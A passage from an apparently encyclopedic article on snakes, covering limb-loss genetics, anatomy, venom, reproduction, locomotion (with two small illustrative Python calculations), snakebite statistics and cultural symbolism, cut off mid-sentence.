Genetic basis of snake evolution Both fossils and phylogenetic studies demonstrate that snakes evolved from lizards, hence the question became which genetic changes led to limb loss in the snake ancestor. Limb loss is actually very common in extant reptiles and has happened dozens of times within skinks, anguids, and other lizards. In 2016, two studies reported that limb loss in snakes is associated with DNA mutations in the Zone of Polarizing Activity Regulatory Sequence (ZRS), a regulatory region of the sonic hedgehog gene which is critically required for limb development. More advanced snakes have no remnants of limbs, but basal snakes such as pythons and boas do have traces of highly reduced, vestigial hind limbs. Python embryos even have fully developed hind limb buds, but their later development is stopped by the DNA mutations in the ZRS. Distribution There are about 3,900 species of snakes, ranging as far northward as the Arctic Circle in Scandinavia and southward through Australia. Snakes can be found on every continent except Antarctica, as well as in the sea, and as high as about 4,900 m (16,000 ft) in the Himalayan Mountains of Asia. There are numerous islands from which snakes are absent, such as Ireland, Iceland, and New Zealand (although New Zealand's northern waters are infrequently visited by the yellow-bellied sea snake and the banded sea krait). Biology Size The now extinct Titanoboa cerrejonensis was 12.8 m (42 ft) in length. By comparison, the largest extant snakes are the reticulated python, measuring about 6.95 m (22.8 ft) long, and the green anaconda, which measures about 5.21 m (17.1 ft) long and is considered the heaviest snake on Earth at about 97.5 kg (215 lb). At the other end of the scale, the smallest extant snake is Leptotyphlops carlae, with a length of about 10.4 cm (4.1 in). Most snakes are fairly small animals, approximately 1 m (3.3 ft) in length. Perception Some of the most highly developed sensory systems are found in the Crotalidae, or pit vipers—the rattlesnakes and their associates. Pit vipers have all the sense organs of other snakes, as well as additional aids. "Pit" refers to the special infrared-sensitive receptors located on either side of the head, between the nostrils and the eyes; in fact, the pits look like an extra pair of nostrils. All snakes can sense warmth with touch and heat receptors, as other animals do; however, the highly developed pit of the pit vipers is distinctive. Each pit is made of two cavities: the larger lies just behind and generally below the level of the nostril and opens forward, and behind it is a finer, barely visible one. The cavities are connected internally, separated only by a membrane whose nerves are extraordinarily attuned to detecting temperature changes. As with the overlapping visual fields of human eyes, the forward-facing pits on either side of the face combine to produce a single field of perception: a pit viper can distinguish between objects and their environments, as well as accurately judge the distance between objects and itself. The heat-sensing ability of a pit viper is so great that it can react to a difference as small as one third of a degree Fahrenheit. Other infrared-sensitive snakes have multiple, smaller labial pits lining the upper lip, just below the nostrils. A snake tracks its prey using smell, collecting airborne particles with its forked tongue, then passing them to the vomeronasal organ or Jacobson's organ in the mouth for examination. The fork in the tongue provides a sort of directional sense of smell and taste simultaneously.
The snake's tongue is constantly in motion, sampling particles from the air, ground, and water, analyzing the chemicals found, and determining the presence of prey or predators in the local environment. In water-dwelling snakes, such as the anaconda, the tongue functions efficiently underwater. To pick up particles in the air, the tongue is flicked out. Like a hand assessing the weight of an object, the fork in the tongue simultaneously provides a sort of directional sense. Snakes have a good sense of smell, but this sense is greatly enhanced by a special organ, the Jacobson's organ. As the tongue is drawn back into the mouth, the forked tip is pressed into the paired cavities of the Jacobson's organ, and the tongue and the organ work in concert in a taste-smell analysis. The organ gives the snake a detailed chemical picture of its surroundings. Until as late as the mid-20th century it was assumed that snakes could not hear. In fact, snakes have two distinct and wholly independent systems for detecting vibration. One of these systems, the somatic, involves transmission of frequencies through ventral skin receptors via the spine. The other system involves vibrations that are transmitted through the snake's attenuated lung to the brain via a cranial nerve. A snake's sensitivity to vibration is extremely high; in a quiet room, a snake can detect someone speaking softly. Snake vision varies greatly between species. Some have keen eyesight and others are only able to distinguish light from dark, but the important trend is that a snake's visual perception is adequate to track movements. Generally, vision is best in tree-dwelling snakes and weakest in burrowing snakes. Some have binocular vision, where both eyes are capable of focusing on the same point, an example being the Asian vine snake. Most snakes focus by moving the lens back and forth in relation to the retina. Diurnal snakes have round pupils and many nocturnal snakes have slit pupils. Most species possess three visual pigments and are probably able to see two primary colors in daylight. The annulated sea snake and the genus Helicops appear to have regained much of their color vision as an adaptation to the marine environments they live in. It has been concluded that the last common ancestor of all snakes had UV-sensitive vision, but most snakes that depend on their eyesight to hunt in daylight have evolved lenses that act like sunglasses, filtering out UV light, which probably also sharpens their vision by improving contrast. Skin The skin of a snake is covered in scales. Contrary to the popular notion of snakes being slimy (because of possible confusion of snakes with worms), snakeskin has a smooth, dry texture. Most snakes use specialized belly scales to travel, allowing them to grip surfaces. The body scales may be smooth, keeled, or granular. The eyelids of a snake are transparent "spectacle" scales, also known as brille, which remain permanently closed. A snake's skin is modified for its specialized form of locomotion. The outer layer, the epidermis, is formed of a substance called keratin, which in mammals is the same basic material that forms nails, claws, and hair; beneath it lies the dermis, which contains the pigments and cells that make up the snake's distinguishing pattern and color.
The snake's epidermis of keratin provides it with the armor it needs to protect its internal organs and reduces friction as it passes over rocks. Parts of this keratin armor are rougher and thicker than others: the free portion of each scale overlaps the front of the scale behind it, and between the scales lies folded connecting material, also of keratin and also part of the epidermis, which gives as the snake undulates or eats things bigger than the circumference of its body. The shedding of scales is called ecdysis (or, in normal usage, molting or sloughing). Snakes shed the complete outer layer of skin in one piece. Snake scales are not discrete, but extensions of the epidermis—hence they are not shed separately but as a complete outer layer during each molt, akin to a sock being turned inside out. Snakes have a wide diversity of skin coloration patterns, which are often related to behavior, such as the tendency to flee from predators. Snakes that are at a high risk of predation tend to be plain, or have longitudinal stripes, providing few reference points to predators, thus allowing the snake to escape without being noticed. Plain snakes usually adopt active hunting strategies, as their pattern allows them to send little information to prey about motion. Blotched snakes usually use ambush-based strategies, likely because the pattern helps them blend into an environment with irregularly shaped objects, like sticks or rocks. Spotted patterning can similarly help snakes to blend into their environment. The shape and number of scales on the head, back, and belly are often characteristic and used for taxonomic purposes. Scales are named mainly according to their positions on the body. In "advanced" (caenophidian) snakes, the broad belly scales and rows of dorsal scales correspond to the vertebrae, allowing these to be counted without the need for dissection. Molting Molting (or "ecdysis") serves a number of purposes: it allows old, worn skin to be replaced, and it can be synced to mating cycles, as in other animals. Molting occurs periodically throughout the life of a snake. Before each molt, the snake regulates its diet and seeks defensible shelter. Just before shedding, the skin becomes grey and the snake's eyes turn silvery. The inner surface of the old skin liquefies, causing it to separate from the new skin beneath it. After a few days, the eyes clear and the snake crawls out of its old skin, which splits. The snake rubs its body against rough surfaces to aid the shedding. In many cases, the castaway skin peels backward over the body from head to tail in one piece, like taking the dust jacket off a book, revealing a new, larger, brighter layer of skin which has formed underneath. Renewal of the skin by molting is supposed to allow growth in some animals such as insects, but in the case of snakes this has been disputed. Shedding can release pheromones and revitalize the color and pattern of the skin, increasing the attraction of mates. Snakes may shed four or five times a year, depending on the weather conditions, food supply, age of the snake, and other factors. It is theoretically possible to identify a snake from its cast skin if it is reasonably intact. Mythological associations of snakes with healing and medicine, as pictured in the Rod of Asclepius, are thought to derive from molting. One can attempt to identify the sex of a snake, when the species is not distinctly sexually dimorphic, by probing the cloaca and counting scales.
A probe inserted into the cloaca is measured against the subcaudal scales; because the inverted hemipenes of a male lie in the tail, the probe passes deeper in males, and the scale count thus indicates whether a snake is male or female. Skeleton The skull of a snake differs from that of a lizard in several ways. Snakes have more flexible jaws: instead of a rigid junction between the upper and lower jaw, the lower jaw is connected to the skull by a mobile hinge bone called the quadrate bone. Between the two halves of the lower jaw at the chin there is an elastic ligament that allows for a separation. This allows the snake to swallow food larger in proportion to its size and to go longer without feeding, since snakes ingest relatively more in one feeding. Because the sides of the lower jaw can move independently of one another, a snake resting its jaw on a surface has stereo auditory perception, used for detecting the position of prey. The jaw–quadrate–stapes pathway is capable of detecting vibrations on the angstrom scale, despite the absence of an outer ear and of the impedance-matching mechanism provided by the ossicles in other vertebrates. In a snake's skull the brain is well protected: the neurocranium is solid, complete, and closed at the front, a protection that is especially valuable because brain tissue could otherwise be damaged through the palate. The skeleton of most snakes consists solely of the skull, hyoid, vertebral column, and ribs, though henophidian snakes retain vestiges of the pelvis and rear limbs. The hyoid is a small bone located posterior and ventral to the skull, in the 'neck' region, which serves as an attachment for the muscles of the snake's tongue, as it does in all other tetrapods. The vertebral column consists of between 200 and 400 vertebrae, or sometimes more. The body vertebrae each have two ribs articulating with them. The tail vertebrae are comparatively few in number (often less than 20% of the total) and lack ribs. The vertebrae have projections that allow for strong muscle attachment, enabling locomotion without limbs. Caudal autotomy (self-amputation of the tail), a feature found in some lizards, is absent in most snakes. In the rare cases where it does exist in snakes, caudal autotomy is intervertebral (meaning the separation of adjacent vertebrae), unlike that in lizards, which is intravertebral, i.e. the break happens along a predefined fracture plane present on a vertebra. In some snakes, most notably boas and pythons, there are vestiges of the hindlimbs in the form of a pair of pelvic spurs. These small, claw-like protrusions on each side of the cloaca are the external portion of the vestigial hindlimb skeleton, which includes the remains of an ilium and femur. Snakes are polyphyodonts, with teeth that are continuously replaced. Internal organs Snakes and other non-archosaur reptiles (the archosaurs being crocodilians, dinosaurs including birds, and their allies) have a three-chambered heart that controls the circulatory system via the left and right atria and one ventricle. Internally, the ventricle is divided into three interconnected cavities: the cavum arteriosum, the cavum pulmonale, and the cavum venosum. The cavum venosum receives deoxygenated blood from the right atrium and the cavum arteriosum receives oxygenated blood from the left atrium. Located beneath the cavum venosum is the cavum pulmonale, which pumps blood to the pulmonary trunk. The snake's heart is encased in a sac, called the pericardium, located at the bifurcation of the bronchi.
The heart is able to move around, owing to the lack of a diaphragm; this mobility protects the heart from potential damage when large ingested prey is passed through the esophagus. The spleen is attached to the gall bladder and pancreas and filters the blood. The thymus, located in fatty tissue above the heart, is responsible for the generation of immune cells in the blood. The cardiovascular system of snakes is unique for the presence of a renal portal system, in which the blood from the snake's tail passes through the kidneys before returning to the heart. The circulatory system of a snake is basically like that of any other vertebrate. However, snakes do not internally regulate the temperature of their blood. Though called cold-blooded, snakes actually have blood whose temperature tracks that of the immediate environment, and they regulate it behaviorally, by moving. Left too long in direct sunlight, a snake's blood can heat beyond tolerance; left in ice or snow, the snake may freeze. In temperate zones with pronounced seasonal changes, snakes denning together have adapted to the onslaught of winter. The vestigial left lung is often small or sometimes even absent, as snakes' tubular bodies require all of their organs to be long and thin. In the majority of species, only one lung is functional. This lung contains a vascularized anterior portion and a posterior portion that does not function in gas exchange. This 'saccular lung' is used for hydrostatic purposes to adjust buoyancy in some aquatic snakes; its function remains unknown in terrestrial species. Many organs that are paired, such as kidneys or reproductive organs, are staggered within the body, one located ahead of the other. This particular arrangement of organs may give the snake greater efficiency; in the lung, for example, the portion nearest the head and throat handles oxygen intake, while the remainder serves as an air reserve. The esophagus-stomach-intestine arrangement is a straight line. It ends where the intestinal, urinary, and reproductive tracts open, in a chamber called the cloaca. Snakes have no lymph nodes. Venom Cobras, vipers, and closely related species use venom to immobilize, injure, or kill their prey. The venom is modified saliva, delivered through fangs. The fangs of 'advanced' venomous snakes like viperids and elapids are hollow, allowing venom to be injected more effectively, while the fangs of rear-fanged snakes such as the boomslang simply have a groove on the posterior edge to channel venom into the wound. Snake venoms are often prey-specific, and their role in self-defense is secondary. Venom, like all salivary secretions, is a predigestant that initiates the breakdown of food into soluble compounds, facilitating proper digestion. Even nonvenomous snakebites (like any animal bite) cause tissue damage. Certain birds, mammals, and other snakes (such as kingsnakes) that prey on venomous snakes have developed resistance and even immunity to certain venoms. Venomous snakes include three families of snakes and do not constitute a formal taxonomic classification group. The colloquial term "poisonous snake" is generally an incorrect label for snakes: a poison is inhaled or ingested, whereas venom produced by snakes is injected into the victim via fangs.
There are, however, two exceptions: Rhabdophis sequesters toxins from the toads it eats, then secretes them from nuchal glands to ward off predators; and a small, unusual population of garter snakes in the US state of Oregon retains enough toxins in their livers from ingested newts to be effectively poisonous to small local predators (such as crows and foxes). Snake venoms are complex mixtures of proteins, and are stored in venom glands at the back of the head. In all venomous snakes, these glands open through ducts into grooved or hollow teeth in the upper jaw. The proteins can potentially be a mix of neurotoxins (which attack the nervous system), hemotoxins (which attack the circulatory system), cytotoxins (which attack cells directly), bungarotoxins (related to neurotoxins, but which also directly affect muscle tissue), and many other toxins that affect the body in different ways. Almost all snake venom contains hyaluronidase, an enzyme that ensures rapid diffusion of the venom. Venomous snakes that use hemotoxins usually have fangs in the front of their mouths, making it easier for them to inject the venom into their victims. Some snakes that use neurotoxins (such as the mangrove snake) have fangs in the back of their mouths, with the fangs curled backwards. This makes it difficult both for the snake to use its venom and for scientists to milk them. Elapids, however, such as cobras and kraits, are proteroglyphous—they possess hollow fangs that cannot be erected toward the front of their mouths and cannot "stab" like a viper; they must actually bite the victim. It has been suggested that all snakes may be venomous to a certain degree, with harmless snakes having weak venom and no fangs. According to this theory, most snakes that are labelled "nonvenomous" would be considered harmless because they either lack a venom delivery method or are incapable of delivering enough to endanger a human. The theory postulates that snakes may have evolved from a common lizard ancestor that was venomous, and that venomous lizards like the Gila monster, beaded lizard, monitor lizards, and the now-extinct mosasaurs may have derived from this same common ancestor. They share this "venom clade" with various other saurian species. Venomous snakes are classified in two taxonomic families: Elapids – cobras including king cobras, kraits, mambas, Australian copperheads, sea snakes, and coral snakes. Viperids – vipers, rattlesnakes, copperheads/cottonmouths, and bushmasters. There is a third family containing the opisthoglyphous (rear-fanged) snakes, as well as the majority of other snake species: Colubrids – boomslangs, tree snakes, vine snakes, and cat snakes, although not all colubrids are venomous. Reproduction Although a wide range of reproductive modes are used by snakes, all employ internal fertilization. This is accomplished by means of paired, forked hemipenes, which are stored, inverted, in the male's tail. The hemipenes are often grooved, hooked, or spined—designed to grip the walls of the female's cloaca. The clitoris of the female snake consists of two structures located between the cloaca and the scent glands. Most species of snakes lay eggs which they abandon shortly after laying. However, a few species (such as the king cobra) construct nests and stay in the vicinity of the hatchlings after incubation. Most pythons coil around their egg-clutches and remain with them until they hatch. A female python will not leave the eggs, except to occasionally bask in the sun or drink water.
She will even "shiver" to generate heat to incubate the eggs. Some species of snake are ovoviviparous and retain the eggs within their bodies until they are almost ready to hatch. Several species of snake, such as the boa constrictor and green anaconda, are fully viviparous, nourishing their young through a placenta as well as a yolk sac; this is highly unusual among reptiles, and otherwise normally found in requiem sharks or placental mammals. Retention of eggs and live birth are most often associated with colder environments. Sexual selection in snakes is demonstrated by the 3,000 species that each use different tactics in acquiring mates. Ritual combat between males for the females they want to mate with includes topping, a behavior exhibited by most viperids in which one male will twist around the vertically elevated fore body of its opponent and force it downward. It is common for neck-biting to occur while the snakes are entwined. Facultative parthenogenesis Parthenogenesis is a natural form of reproduction in which growth and development of embryos occur without fertilization. Agkistrodon contortrix (copperhead) and Agkistrodon piscivorus (cottonmouth) can reproduce by facultative parthenogenesis, meaning that they are capable of switching from a sexual mode of reproduction to an asexual mode. The most likely type of parthenogenesis to occur is automixis with terminal fusion, a process in which two terminal products from the same meiosis fuse to form a diploid zygote. This process leads to genome-wide homozygosity, expression of deleterious recessive alleles, and often to developmental abnormalities. Both captive-born and wild-born copperheads and cottonmouths appear to be capable of this form of parthenogenesis. Reproduction in squamate reptiles is almost exclusively sexual. Males ordinarily have a ZZ pair of sex-determining chromosomes, and females a ZW pair. However, the Colombian rainbow boa (Epicrates maurus) can also reproduce by facultative parthenogenesis, resulting in production of WW female progeny. The WW females are likely produced by terminal automixis. Embryonic development Snake embryonic development initially follows similar steps as any vertebrate embryo. The snake embryo begins as a zygote, undergoes rapid cell division, forms a germinal disc (also called a blastodisc), then undergoes gastrulation, neurulation, and organogenesis. Cell division and proliferation continue until an early snake embryo develops and the typical body shape of a snake can be observed. Multiple features differentiate the embryologic development of snakes from that of other vertebrates, two significant factors being the elongation of the body and the lack of limb development. The elongation of the snake body is accompanied by a significant increase in vertebra count (mice have 60 vertebrae, whereas snakes may have over 300). This increase in vertebrae is due to an increase in somites during embryogenesis, leading to an increased number of vertebrae which develop. Somites are formed at the presomitic mesoderm due to a set of oscillatory genes that direct the somitogenesis clock. The snake somitogenesis clock operates at a frequency four times that of a mouse (after correction for developmental time), creating more somites and therefore more vertebrae. This difference in clock speed is believed to be caused by differences in the expression of Lunatic fringe, a gene involved in the somitogenesis clock.
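As a back-of-the-envelope illustration of the clock argument (a toy calculation using only the figures quoted above; real somite counts also depend on how long segmentation lasts, which this sketch deliberately ignores):

```python
# Toy version of the somitogenesis-clock argument. If segmentation runs
# for a comparable stretch of (normalized) developmental time in both
# animals, the somite (and hence vertebra) count scales with clock rate.
MOUSE_VERTEBRAE = 60   # approximate figure quoted in the text
CLOCK_SPEEDUP = 4      # snake clock runs ~4x faster, per the text

predicted_snake_vertebrae = MOUSE_VERTEBRAE * CLOCK_SPEEDUP
print(predicted_snake_vertebrae)  # 240 -- the same order of magnitude
                                  # as the 300+ vertebrae snakes can have
```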
There is ample literature on limb development, and its absence, in snake embryos and on the gene expression associated with the different stages. In basal snakes, such as the python, embryos in early development exhibit a hind limb bud that develops with some cartilage and a cartilaginous pelvic element; however, this degenerates before hatching. This vestigial development suggests that some snakes are still undergoing hind limb reduction before the structures are eliminated. There is no evidence in basal snakes of forelimb rudiments and no examples of snake forelimb bud initiation in embryos, so little is known regarding the loss of this trait. Recent studies suggest that hind limb reduction could be due to mutations in enhancers for the Shh (sonic hedgehog) gene, while other studies suggest that mutations within the Hox genes or their enhancers could contribute to snake limblessness. Since multiple studies have found evidence suggesting different genes played a role in the loss of limbs in snakes, it is likely that multiple gene mutations had an additive effect leading to limb loss. Behavior and life history Winter dormancy In regions where winters are too cold for snakes to tolerate while remaining active, local species will enter a period of brumation. Unlike hibernation, in which dormant mammals are actually asleep, brumating reptiles are awake but inactive. Individual snakes may brumate in burrows, under rock piles, or inside fallen trees, or large numbers of snakes may clump together in hibernacula. Feeding and diet All snakes are strictly carnivorous, preying on small animals including lizards, frogs, other snakes, small mammals, birds, eggs, fish, snails, worms, and insects. Snakes cannot bite or tear their food to pieces, so they must swallow their prey whole. The eating habits of a snake are largely influenced by body size; smaller snakes eat smaller prey. Juvenile pythons might start out feeding on lizards or mice and graduate to small deer or antelope as adults, for example. The snake's jaw is a complex structure. Contrary to the popular belief that snakes can dislocate their jaws, they have an extremely flexible lower jaw, the two halves of which are not rigidly attached, and numerous other joints in the skull, which allow the snake to open its mouth wide enough to swallow prey whole, even if it is larger in diameter than the snake itself. For example, the African egg-eating snake has flexible jaws adapted for eating eggs much larger than the diameter of its head. This snake has no teeth, but does have bony protrusions on the inside edge of its spine, which it uses to break the shell when eating eggs. The majority of snakes eat a variety of prey animals, but there is some specialization in certain species. King cobras and the Australian bandy-bandy consume other snakes. Species of the family Pareidae have more teeth on the right side of their mouths than on the left, as they mostly prey on snails and the shells usually spiral clockwise. Some snakes have a venomous bite, which they use to kill their prey before eating it. Other snakes kill their prey by constriction, while some swallow their prey while it is still alive. After eating, snakes become dormant to allow the process of digestion to take place; this is an intense activity, especially after consumption of large prey. In species that feed only sporadically, the entire intestine enters a reduced state between meals to conserve energy.
The digestive system is then 'up-regulated' to full capacity within 48 hours of prey consumption. Because snakes are ectothermic ("cold-blooded"), the surrounding temperature plays an important role in the digestion process; the ideal temperature for snakes to digest food is around 30 °C (86 °F). A huge amount of metabolic energy is involved in a snake's digestion: the surface body temperature of the South American rattlesnake (Crotalus durissus), for example, increases by as much as 1.2 °C (2.2 °F) during the digestive process. If a snake is disturbed after having eaten recently, it will often regurgitate its prey to be able to escape the perceived threat. When undisturbed, the digestive process is highly efficient; the snake's digestive enzymes dissolve and absorb everything but the prey's hair (or feathers) and claws, which are excreted along with waste. Hooding and spitting Hooding (expansion of the neck area) is a visual deterrent, mostly seen in cobras (elapids), and is primarily controlled by rib muscles. Hooding can be accompanied by spitting venom towards the threatening object and by producing a specialized sound: hissing. Studies on captive cobras showed that 13–22% of the body length is raised during hooding. Locomotion The lack of limbs does not impede the movement of snakes. They have developed several different modes of locomotion to deal with particular environments. Unlike the gaits of limbed animals, which form a continuum, each mode of snake locomotion is discrete and distinct from the others; transitions between modes are abrupt. Lateral undulation Lateral undulation is the sole mode of aquatic locomotion, and the most common mode of terrestrial locomotion. In this mode, the body of the snake alternately flexes to the left and right, resulting in a series of rearward-moving "waves". While this movement appears rapid, snakes have rarely been documented moving faster than two body-lengths per second, often much less. This mode of movement has the same net cost of transport (calories burned per meter moved) as running in lizards of the same mass. Terrestrial lateral undulation is the most common mode of terrestrial locomotion for most snake species. In this mode, the posteriorly moving waves push against contact points in the environment, such as rocks, twigs, and irregularities in the soil. Each of these environmental objects, in turn, generates a reaction force directed forward and towards the midline of the snake, resulting in forward thrust while the lateral components cancel out. The speed of this movement depends upon the density of push-points in the environment, with a medium density of about 8 along the snake's length being ideal. The wave speed is precisely the same as the snake's speed, and as a result, every point on the snake's body follows the path of the point ahead of it, allowing snakes to move through very dense vegetation and small openings. When swimming, the waves become larger as they move down the snake's body, and the wave travels backwards faster than the snake moves forwards. Thrust is generated by pushing the body against the water, resulting in the observed slip. In spite of overall similarities, studies show that the pattern of muscle activation is different in aquatic versus terrestrial lateral undulation, which justifies calling them separate modes. All snakes can laterally undulate forward (with backward-moving waves), but only sea snakes have been observed reversing the motion (moving backwards with forward-moving waves).
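The geometric claim above, that every point follows the path of the point ahead of it, can be checked with a minimal kinematic sketch (a toy traveling-wave model in the body frame; the function name and all parameters are invented for illustration, and the model ignores the snake's forward translation, which is what makes the claim exact when wave speed matches ground speed):

```python
import math

# Traveling-wave model of lateral undulation: lateral offset at arc
# position s (m, head to tail) and time t (s) is a pure function of
# (s - c*t), so the whole pattern slides tailward at wave speed c.
A, L, c = 0.05, 0.5, 0.4   # amplitude (m), wavelength (m), wave speed (m/s)

def lateral_offset(s, t):
    return A * math.sin(2 * math.pi * (s - c * t) / L)

# Because y depends only on (s - c*t), the point at s = 0.14 m now
# (t = 1.0 s) has exactly the offset that the point 0.04 m ahead of it
# (s = 0.10 m) had 0.1 s earlier, since c * 0.1 s = 0.04 m:
assert abs(lateral_offset(0.14, 1.0) - lateral_offset(0.10, 0.9)) < 1e-12
```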
Sidewinding Most often employed by colubroid snakes (colubrids, elapids, and vipers) when the snake must move in an environment that lacks irregularities to push against (rendering lateral undulation impossible), such as a slick mud flat or a sand dune, sidewinding is a modified form of lateral undulation in which all of the body segments oriented in one direction remain in contact with the ground, while the other segments are lifted up, resulting in a peculiar "rolling" motion. The sidewinder moves forward by throwing a loop of itself ahead and then pulling itself up by it: by lowering its head the snake gains leverage, and by straightening out and pressing against the ground it brings itself forward, at an angle that leaves it ready for the next movement. The head and the loop are in effect the two feet upon which the snake walks. The snake's body, lying roughly perpendicular to its direction of travel, may bewilder the observer, since preconception leads one to associate snake movement with a head that leads and a body that follows. The sidewinder appears to be going sideways, but the head points clearly to where the snake is going. The snake leaves behind a trail that looks like a series of hooks, one after the next. Snakes can move backwards to retreat from an enemy, though they normally do not. This mode of locomotion overcomes the slippery nature of sand or mud by pushing off with only static portions of the body, thereby minimizing slipping. The static nature of the contact points can be shown from the tracks of a sidewinding snake, which show each belly scale imprint without any smearing. This mode of locomotion has very low caloric cost, less than one-third of the cost for a lizard to move the same distance. Contrary to popular belief, there is no evidence that sidewinding is associated with the sand being hot. Concertina When push-points are absent but there is not enough space to use sidewinding because of lateral constraints, such as in tunnels, snakes rely on concertina locomotion. In this mode, the snake braces the posterior portion of its body against the tunnel wall while the front of the snake extends and straightens. The front portion then flexes and forms an anchor point, and the posterior is straightened and pulled forwards. This mode of locomotion is slow and very demanding, up to seven times the cost of laterally undulating over the same distance. This high cost is due to the repeated stops and starts of portions of the body as well as the necessity of using active muscular effort to brace against the tunnel walls. Arboreal The movement of snakes in arboreal habitats has only recently been studied. While on tree branches, snakes use several modes of locomotion depending on the species and bark texture. In general, snakes will use a modified form of concertina locomotion on smooth branches, but will laterally undulate if contact points are available. Snakes move faster on small branches and when contact points are present, in contrast to limbed animals, which do better on large branches with little 'clutter'. Gliding snakes (Chrysopelea) of Southeast Asia launch themselves from branch tips, spreading their ribs and laterally undulating as they glide between trees. These snakes can perform a controlled glide for hundreds of feet depending upon launch altitude and can even turn in midair.
Rectilinear The slowest mode of snake locomotion is rectilinear locomotion, which is also the only one in which the snake does not need to bend its body laterally, though it may do so when turning. In this mode, the belly scales are lifted and pulled forward before being placed down and the body pulled over them. Waves of movement and stasis pass posteriorly, resulting in a series of ripples in the skin. The ribs of the snake do not move in this mode of locomotion, and the method is most often used by large pythons, boas, and vipers when stalking prey across open ground, as the snake's movements are subtle and harder for prey to detect. Interactions with humans Bite Snakes do not ordinarily prey on humans. Unless startled or injured, most snakes prefer to avoid contact and will not attack humans. With the exception of large constrictors, nonvenomous snakes are not a threat to humans. The bite of a nonvenomous snake is usually harmless; their teeth are not adapted for tearing or inflicting a deep puncture wound, but rather for grabbing and holding. Although the possibility of infection and tissue damage is present in the bite of a nonvenomous snake, venomous snakes present a far greater hazard to humans. The World Health Organization (WHO) lists snakebite under the "other neglected conditions" category. Documented deaths resulting from snake bites are uncommon, but nonfatal bites from venomous snakes may result in the need for amputation of a limb or part thereof. Of the roughly 725 species of venomous snakes worldwide, only 250 are able to kill a human with one bite. Australia averages only one fatal snake bite per year. In India, 250,000 snakebites are recorded in a single year, with as many as 50,000 recorded deaths. The WHO estimates that on the order of 100,000 people die each year as a result of snake bites, and around three times as many amputations and other permanent disabilities are caused by snakebites annually. Snakebites seriously threaten human health, especially in areas with a great diversity of snakes and little access to medical care, such as the Amazon Rainforest region of South America. Although recorded snakebite deaths are comparatively few, bites can cause serious complications and permanent impairments. The most successful treatment for snakebites is still antivenom, which is made from snake venom. However, access to antivenom differs greatly by location, with rural areas frequently experiencing difficulties with both cost and availability. Venom extraction, serum preparation, and clinical studies are among the intricate procedures involved in manufacturing antivenom. The development of alternative treatments and increased accessibility and affordability of antivenom are essential for reducing the global impact of snake bites on human populations. Snake charmers In some parts of the world, especially in India, snake charming is a roadside show performed by a charmer. In such a show, the snake charmer carries a basket containing a snake that he seemingly charms by playing tunes on his flutelike musical instrument, to which the snake responds. The snake is in fact responding to the movement of the flute, not the sound it makes, as snakes lack external ears (though they do have internal ears). The Wildlife Protection Act of 1972 in India technically prohibits snake charming on the grounds of reducing animal cruelty.
Other types of snake charmers use a snake and mongoose show, in which the two animals have a mock fight; however, this is not very common, as the animals may be seriously injured or killed. Snake charming as a profession is dying out in India because of competition from modern forms of entertainment and environmental laws proscribing the practice. Many Indians have never seen snake charming, and it is becoming a folktale of the past. Trapping The Irula tribe of Andhra Pradesh and Tamil Nadu in India have been hunter-gatherers in the hot, dry plains forests, and have practiced the art of snake catching for generations. They have a vast knowledge of snakes in the field and generally catch them with the help of a simple stick. Earlier, the Irulas caught thousands of snakes for the snake-skin industry. After the complete ban of the snake-skin industry in India and the protection of all snakes under the Indian Wildlife (Protection) Act 1972, they formed the Irula Snake Catchers' Cooperative and switched to catching snakes for venom removal, releasing them in the wild after four extractions. The venom so collected is used for producing life-saving antivenom, for biomedical research, and for other medicinal products. The Irulas are also known to eat some of the snakes they catch, and they are very useful in rat extermination in the villages. Despite the existence of snake charmers, there have also been professional snake catchers or wranglers. Modern-day snake trapping involves a herpetologist using a long stick with a V-shaped end. Some television show hosts, like Bill Haast, Austin Stevens, Steve Irwin, and Jeff Corwin, prefer to catch snakes using bare hands. Consumption Snake flesh and related products are consumed in many cultures around the world, especially in Asian nations such as China, Taiwan, Thailand, Indonesia, Vietnam, and Cambodia. Snake meat is frequently regarded as a delicacy and is eaten for its supposed health benefits and aphrodisiac qualities. It is customary in some places to drink wine laced with snake blood in an attempt to increase virility and vigor, and traditional Chinese medicine holds that snake wine, a beverage of Chinese origin infused with whole snakes, has medicinal uses. However, the use of snake products raises moral questions about conservation and animal welfare, and the harvesting of snakes for human food requires attention and regulation to remain sustainable, particularly in areas where snake populations are in decline as a result of habitat degradation and overexploitation. Pets In the Western world, some snakes are kept as pets, especially docile species such as the ball python and corn snake. To meet the demand, a captive breeding industry has developed. Snakes bred in captivity are considered preferable to specimens caught in the wild and tend to make better pets. Compared with more traditional types of companion animal, snakes can be very low-maintenance pets; they require minimal space, as most common species do not exceed about 1.5 m (5 ft) in length, and can be fed relatively infrequently—usually once every five to fourteen days. Certain snakes have a lifespan of more than 40 years if given proper care. Symbolism In ancient Mesopotamia, Nirah, the messenger god of Ištaran, was represented as a serpent on kudurrus, or boundary stones. Representations of two intertwined serpents are common in Sumerian art and Neo-Sumerian artwork and still appear sporadically on cylinder seals and amulets until as late as the thirteenth century BC.
The horned viper (Cerastes cerastes) appears in Kassite and Neo-Assyrian kudurrus and is invoked in Assyrian texts as a magical protective entity. A dragon-like creature with horns, the body and neck of a snake, the forelegs of a lion, and the hind-legs of a bird appears in Mesopotamian art from the Akkadian Period until the Hellenistic Period (323 BC–31 BC). This creature, known in Akkadian as the mušḫuššu, meaning "furious serpent", was used as a symbol for particular deities and also as a general protective emblem. It seems to have originally been the attendant of the Underworld god Ninazu, but later became the attendant to the Hurrian storm-god Tishpak, as well as, later, Ninazu's son Ningishzida, the Babylonian national god Marduk, the scribal god Nabu, and the Assyrian national god Ashur. In Egyptian history, the snake occupies a primary role, with the Nile cobra adorning the crown of the pharaoh in ancient times. It was worshipped as one of the gods and was also used for sinister purposes: the murder of an adversary and ritual suicide (Cleopatra). The ouroboros was a well-known ancient Egyptian symbol of a serpent swallowing its own tail. The precursor to the ouroboros was the "Many-Faced", a serpent with five heads who, according to the Amduat, the oldest surviving Book of the Afterlife, was said to coil around the corpse of the sun god Ra protectively. The earliest surviving depiction of a "true" ouroboros comes from the gilded shrines in the tomb of Tutankhamun. In the early centuries AD, the ouroboros was adopted as a symbol by Gnostic Christians, and chapter 136 of the Pistis Sophia, an early Gnostic text, describes "a great dragon whose tail is in its mouth". In medieval alchemy, the ouroboros became a typical western dragon with wings, legs, and a tail. In the Bible, King Nahash of Ammon, whose name means "Snake", is depicted very negatively, as a particularly cruel and despicable enemy of the ancient Hebrews. The ancient Greeks used the Gorgoneion, a depiction of a hideous face with serpents for hair, as an apotropaic symbol to ward off evil. In a Greek myth described by Pseudo-Apollodorus in his Bibliotheca, Medusa was a Gorgon with serpents for hair whose gaze turned all those who 